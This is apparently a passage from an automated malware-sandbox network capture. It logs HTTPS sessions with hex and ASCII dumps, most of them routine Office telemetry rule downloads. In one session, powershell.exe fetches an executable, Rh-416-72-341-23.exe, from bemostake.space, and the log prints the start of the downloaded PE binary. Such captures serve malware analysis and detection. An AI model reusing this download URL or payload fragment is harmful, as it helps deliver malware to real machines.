                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185120Z-1657d5bbd48gqrfwecymhhbfm8000000048g0000000071ez
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:20 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.749716188.114.96.34435884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:21 UTC127OUTGET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1
                                                                                                      Host: bemostake.space
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-08 18:51:22 UTC673INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:22 GMT
                                                                                                      Content-Type: application/x-msdownload
                                                                                                      Content-Length: 2322503
                                                                                                      Connection: close
                                                                                                      last-modified: Tue, 01 Oct 2024 18:58:16 GMT
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      Cache-Control: max-age=14400
                                                                                                      CF-Cache-Status: MISS
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BZ%2BFCrpDe4lFhJd8GW5pVna2UCxAxe%2B40klGW9jUYtzHdeiO5zcQgS36%2FRYBxgfjYkp0WW8YmS0mCTqB8fRc96UHbZO2%2FR%2FtKcF7qUMwSpfK8M%2Fsn2aoNMRPKyzxVicD1Uc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8cf85263a883729b-EWR
                                                                                                      2024-10-08 18:51:22 UTC696INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 77 2d fc 66 00 ac 1d 00 65 18 00 00 f0 00 26 02 0b 02 02 2a 00 92 0b 00 00 a8 1d 00 00 04 00 00 d0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 20 1e 00 00 04 00 00 4a dc 23 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdw-fe&*@ J#`
                                                                                                      2024-10-08 18:51:22 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 1d 00 00 02 00 00 00 92 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 04 00 00 00 f0 1d 00 00 06 00 00 00 94 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 11 00 00 00 00 1e 00 00 12 00 00 00 9a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: @.tls@.rsrc@@.reloc@B
                                                                                                      2024-10-08 18:51:22 UTC1369INData Raw: 83 ec 28 e8 6f c0 0a 00 48 83 f8 01 19 c0 48 83 c4 28 c3 90 90 90 90 90 90 90 90 90 90 90 90 48 8d 0d 09 00 00 00 e9 d4 ff ff ff 0f 1f 40 00 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 48 83 ec 28 4c 39 c1 77 0b 48 89 d0 48 89 ca 48 83 c4 28 c3 4c 89 c2 4d 89 c8 e8 51 c0 09 00 cc 48 83 ec 28 4d 89 c2 49 29 ca 72 0e 48 01 ca 48 89 d0 4c 89 d2 48 83 c4 28 c3 4c 89 c2 4d 89 c8 e8 bb bf 09 00 cc 41 57 41 56 41 55 41 54 56 57 55 53 48 83 ec 68 48 89 d6 48 89 cf 0f 57 c0 4c 8d 74 24 40 41 0f 29 46 10 41 0f 29 06 4c 8d 7c 24 20 48 8d 2d 37 ab 0b 00 4c 8d 64 24 30 41 b8 20 00 00 00 48 89 f9 4c 89 f2 e8 8f 14 00 00 48 89 c3 49 89 d5 48 89 44 24 30 48 89 54 24 38 48 85 c0 74 3d 4c 89 f9 4c 89 ea e8 74 00 00 00 0f b6 44 24 20 48 63 44 85 00 48 01 e8 ff e0 48 8b
                                                                                                      Data Ascii: (oHH(H@H(L9wHHH(LMQH(MI)rHHLH(LMAWAVAUATVWUSHhHHWLt$@A)FA)L|$ H-7Ld$0A HLHIHD$0HT$8Ht=LLtD$ HcDHH
                                                                                                      2024-10-08 18:51:22 UTC1369INData Raw: 0f 85 80 6e 0a 00 e9 2b 81 0a 00 48 83 ec 28 48 8b 09 e8 c0 ff ff ff 31 c0 48 83 c4 28 c3 56 48 83 ec 20 48 89 ce e8 c3 04 00 00 48 8d 4e 18 e8 ba 04 00 00 48 83 c6 30 48 89 f1 48 83 c4 20 5e e9 a9 04 00 00 56 48 83 ec 20 48 89 ce e8 d1 03 00 00 48 83 c6 18 48 89 f1 48 83 c4 20 5e e9 c0 03 00 00 56 57 53 48 83 ec 20 48 8b 31 89 f0 83 e0 03 83 f8 01 75 47 48 8b 7e ff 48 8b 5e 07 48 8b 03 48 85 c0 74 05 48 89 f9 ff d0 48 ff ce 4c 8b 43 08 4d 85 c0 74 0c 48 8b 53 10 48 89 f9 e8 94 08 00 00 ba 18 00 00 00 41 b8 08 00 00 00 48 89 f1 48 83 c4 20 5b 5f 5e e9 e8 23 00 00 90 48 83 c4 20 5b 5f 5e c3 41 57 41 56 41 55 41 54 56 57 55 53 48 83 ec 48 48 89 ce e8 44 03 00 00 48 8b 7e 28 48 89 74 24 40 48 8b 76 30 48 8d 5f 08 48 83 ee 01 72 0e 48 89 d9 e8 25 03 00 00 48
                                                                                                      Data Ascii: n+H(H1H(VH HHNH0HH ^VH HHHH ^VWSH H1uGH~H^HHtHHLCMtHSHAHH [_^#H [_^AWAVAUATVWUSHHHDH~(Ht$@Hv0H_HrH%H
                                                                                                      2024-10-08 18:51:22 UTC1369INData Raw: c3 4d 89 c1 48 89 c8 41 b8 02 00 00 00 48 89 d1 48 89 c2 e9 95 f5 ff ff 56 48 83 ec 20 48 89 ce 48 b8 00 00 00 00 00 00 00 80 48 39 01 75 19 48 89 f1 e8 5e ff ff ff 48 83 26 00 48 c7 46 08 01 00 00 00 48 83 66 10 00 48 89 f0 48 83 c4 20 5e c3 48 83 ec 38 48 b8 00 00 00 00 00 00 00 80 48 39 02 74 26 48 8b 42 30 48 89 41 30 0f 10 02 0f 10 4a 10 0f 10 52 20 0f 11 51 20 0f 11 49 10 0f 11 01 48 89 c8 48 83 c4 38 c3 48 8b 4a 08 48 8d 44 24 30 48 89 08 4c 89 44 24 20 4c 8d 0d d3 a3 0b 00 b9 01 00 00 00 31 d2 49 89 c0 e8 7c 58 09 00 cc 48 83 ec 38 48 83 39 00 75 08 8b 41 10 48 83 c4 38 c3 48 8b 41 08 8b 49 10 4c 8d 44 24 28 49 89 00 41 89 48 08 48 89 54 24 20 48 8d 0d c8 22 19 00 4c 8d 0d ab a3 0b 00 ba 13 00 00 00 e8 39 58 09 00 cc 41 57 41 56 56 57 53 48 83 ec
                                                                                                      Data Ascii: MHAHHVH HHH9uH^H&HFHfHH ^H8HH9t&HB0HA0JR Q IHH8HJHD$0HLD$ L1I|XH8H9uAH8HAILD$(IAHHT$ H"L9XAWAVVWSH
                                                                                                      2024-10-08 18:51:22 UTC1369INData Raw: 41 56 41 55 41 54 56 57 55 53 48 83 ec 38 48 89 d6 48 89 cf 48 8d 59 50 4c 8d 71 52 4c 8d 79 30 4c 8d 61 18 31 d2 0f b6 41 50 48 8d 2d 93 9c 0b 00 48 63 44 85 00 48 01 e8 ff e0 f6 47 60 04 75 2a 4c 8b 6f 58 48 83 67 58 00 48 89 d9 e8 39 f9 ff ff c6 47 50 03 4c 89 6f 58 b0 03 31 d2 0f b6 c0 48 63 44 85 00 48 01 e8 ff e0 8a 57 51 80 fa 02 73 31 0f b6 d2 4c 8d 05 17 a1 0b 00 4c 89 f1 e8 23 fa ff ff 49 89 d0 48 89 f1 48 89 c2 e8 c3 03 00 00 48 85 c0 0f 85 a6 03 00 00 02 57 51 88 57 51 eb ca 48 8b 4f 58 48 85 c9 74 0e 41 b8 02 00 00 00 4c 89 f2 e8 4e a2 00 00 44 0f b7 47 52 4c 8d 6c 24 20 4c 89 e9 31 d2 e8 20 b3 00 00 48 89 f9 e8 65 f9 ff ff 49 8b 45 10 48 89 47 10 41 0f 10 45 00 0f 11 07 4c 8b 6f 58 48 83 67 58 00 48 89 d9 e8 93 f8 ff ff c6 47 50 02 66 83 67
                                                                                                      Data Ascii: AVAUATVWUSH8HHHYPLqRLy0La1APH-HcDHG`u*LoXHgXH9GPLoX1HcDHWQs1LL#IHHHWQWQHOXHtALNDGRLl$ L1 HeIEHGAELoXHgXHGPfg
                                                                                                      2024-10-08 18:51:22 UTC1369INData Raw: 54 56 57 55 53 48 81 ec 28 01 00 00 4c 89 44 24 48 48 89 54 24 60 48 89 cb 48 ba 00 00 00 00 00 00 00 80 48 8d 41 68 48 89 44 24 50 48 8d 81 80 00 00 00 48 89 44 24 40 4c 8d a9 b0 00 00 00 48 8d 41 08 48 89 44 24 38 48 8d 41 58 48 89 44 24 58 48 8d 41 60 48 89 44 24 68 48 8b 01 48 8d 0c 02 48 ff c9 48 31 d0 45 31 e4 48 83 f9 04 49 0f 43 c4 4c 8d 35 0e 97 0b 00 49 63 04 86 4c 01 f0 31 f6 ff e0 48 89 d9 48 8b 54 24 40 e8 14 fa ff ff 48 85 c0 0f 85 56 02 00 00 48 8d 54 24 70 b9 0d 00 00 00 48 89 d7 48 89 de f3 48 a5 48 bf 00 00 00 00 00 00 00 80 48 89 3b 48 89 7b 18 48 89 7b 30 83 63 48 00 31 c0 88 43 4c c6 43 50 06 88 43 60 48 8d b4 24 d8 00 00 00 48 89 f1 e8 d9 a1 00 00 48 89 d9 e8 88 f3 ff ff 48 8d 47 01 48 89 03 48 8d 0c 07 48 ff c9 48 31 f8 45 31 e4 48
                                                                                                      Data Ascii: TVWUSH(LD$HHT$`HHHAhHD$PHHD$@LHAHD$8HAXHD$XHA`HD$hHHHH1E1HICL5IcL1HHT$@HVHT$pHHHHH;H{H{0cH1CLCPC`H$HHHGHHHH1E1H
                                                                                                      2024-10-08 18:51:22 UTC1369INData Raw: 04 86 4c 01 f0 31 f6 ff e0 4c 8d 74 24 70 b9 0a 00 00 00 4c 89 f7 4c 8b 7c 24 38 4c 89 fe f3 48 a5 48 be 00 00 00 00 00 00 00 80 48 89 73 08 48 89 73 20 48 89 73 38 83 63 50 00 c6 43 54 00 48 89 d9 e8 d2 ee ff ff 48 83 c6 04 48 89 33 b9 0a 00 00 00 4c 89 ff 4c 89 f6 f3 48 a5 be 01 00 00 00 e8 55 9d 00 00 e9 27 fd ff ff 4c 8b 64 24 78 e9 25 fd ff ff 4c 8d 05 b6 95 0b 00 4c 89 e1 48 8b 54 24 48 e8 69 a5 09 00 cc 41 56 56 57 53 48 83 ec 48 4c 89 c7 48 89 d3 48 89 ce 48 8b 41 20 48 3b 41 28 75 19 48 39 7e 18 77 13 48 89 f1 48 89 da 49 89 f8 e8 0b e9 ff ff 48 89 c2 eb 49 4c 8d 74 24 38 4c 89 f1 48 89 f2 e8 4c 00 00 00 49 8b 06 49 8b 56 08 48 85 c0 74 39 48 8d 4c 24 28 48 89 01 48 89 51 08 48 89 da 49 89 f8 e8 d3 e8 ff ff 48 89 c2 48 03 46 20 48 8b 4e 28 48 39
                                                                                                      Data Ascii: L1Lt$pLL|$8LHHHsHs Hs8cPCTHHH3LLHU'Ld$x%LLHT$HiAVVWSHHLHHHA H;A(uH9~wHHIHILt$8LHLIIVHt9HL$(HHQHIHHF HN(H9
                                                                                                      2024-10-08 18:51:22 UTC1369INData Raw: 00 48 89 d7 f3 48 a5 48 8d b4 24 b0 02 00 00 48 89 f1 e8 f2 97 00 00 4c 8b 3e 48 8d b4 24 b8 02 00 00 48 8d bc 24 08 03 00 00 b9 09 00 00 00 f3 48 a5 49 8d 5c 24 01 31 ed eb 08 49 8d 5c 24 03 40 b5 01 48 8d b4 24 e0 02 00 00 48 89 f1 31 d2 e8 43 9b 00 00 0f 10 84 24 90 01 00 00 0f 10 8c 24 a0 01 00 00 0f 10 94 24 b0 01 00 00 0f 29 56 f0 0f 29 4e e0 0f 29 46 d0 48 8d 4c 24 38 e8 47 92 00 00 48 8d 7c 24 50 48 8d b4 24 b0 02 00 00 b9 09 00 00 00 f3 48 a5 40 84 ed 74 0d 48 8d 8c 24 e8 00 00 00 e8 f3 e8 ff ff 48 8d bc 24 d0 01 00 00 48 89 5f f0 4c 89 7f f8 48 8d b4 24 08 03 00 00 b9 0b 00 00 00 f3 48 a5 48 8d 84 24 28 02 00 00 48 8d 54 24 38 b9 0c 00 00 00 48 89 c7 48 89 d6 f3 48 a5 c6 40 60 00 48 83 22 00 48 c7 42 08 01 00 00 00 48 83 62 10 00 48 8d 8c 24 c0
                                                                                                      Data Ascii: HHH$HL>H$H$HI\$1I\$@H$H1C$$$)V)N)FHL$8GH|$PH$H@tH$H$H_LH$HH$(HT$8HHH@`H"HBHbH$
                                                                                                      2024-10-08 18:51:22 UTC1369INData Raw: 36 27 e6 df d9 48 89 10 48 8d b4 24 c0 01 00 00 48 8b 16 e8 5d ef ff ff 48 83 26 00 41 b1 01 31 c9 48 8d 15 d8 8f 0b 00 49 b8 00 38 f3 1e 62 40 d1 44 41 f6 c1 01 74 1e 44 0f b6 0c 11 4d 09 c1 4c 33 0c 08 4c 89 8c 0c c0 01 00 00 b9 08 00 00 00 45 31 c9 eb dc 0f b7 40 08 35 8c f7 00 00 48 8d b4 24 c0 01 00 00 48 8b 0e 48 8d 94 24 e8 00 00 00 48 89 0a 66 89 42 08 41 b8 0a 00 00 00 48 89 f1 e8 d9 77 05 00 48 8b 94 24 b8 02 00 00 4c 8b 84 24 c0 02 00 00 48 89 f1 e8 e1 78 05 00 c7 86 c4 00 00 00 00 00 00 08 48 8d 7c 24 38 48 89 f9 48 89 f2 e8 d7 89 04 00 4c 8d 05 50 8f 0b 00 48 8d 9c 24 08 03 00 00 48 89 d9 48 89 fa e8 c1 e4 ff ff 48 89 f1 e8 d6 df ff ff 83 7b 30 00 0f 85 f4 01 00 00 48 8d 05 05 18 18 00 48 8d 94 24 c0 01 00 00 48 89 02 48 8b 0a 48 b8 e2 17 cd
                                                                                                      Data Ascii: 6'HH$H]H&A1HI8b@DAtDML3LE1@5H$HH$HfBAHwH$L$HxH|$8HHLPH$HHH{0HH$HHH


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      7192.168.2.74971313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:21 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:21 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:21 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 471
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                      ETag: "0x8DC582BB10C598B"
                                                                                                      x-ms-request-id: 73fc0cc0-d01e-008e-5fee-16387a000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185121Z-1657d5bbd48cpbzgkvtewk0wu000000005c000000000x140
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      8192.168.2.74971213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:21 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:21 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:21 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 415
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                      ETag: "0x8DC582B9F6F3512"
                                                                                                      x-ms-request-id: 1707b783-801e-00a3-53e5-167cfb000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185121Z-1657d5bbd48762wn1qw4s5sd30000000059000000000asek
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      9192.168.2.74971113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:21 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:21 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:21 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 474
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                      ETag: "0x8DC582B9964B277"
                                                                                                      x-ms-request-id: 1be53f37-001e-00a2-0266-17d4d5000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185121Z-1657d5bbd48gqrfwecymhhbfm8000000044000000000utyh
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:21 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      10192.168.2.74971413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:21 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:21 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:21 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 632
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                      ETag: "0x8DC582BB6E3779E"
                                                                                                      x-ms-request-id: 15158de7-401e-0029-4b00-179b43000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185121Z-1657d5bbd48wd55zet5pcra0cg000000057g000000010ecp
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:21 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      11192.168.2.74971513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:21 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:21 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:21 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 467
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                      ETag: "0x8DC582BA6C038BC"
                                                                                                      x-ms-request-id: 87fc294c-201e-0051-40f3-167340000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185121Z-1657d5bbd48sdh4cyzadbb3748000000057000000000gk81
                                                                                                      x-fd-int-roxy-purgeid: 0
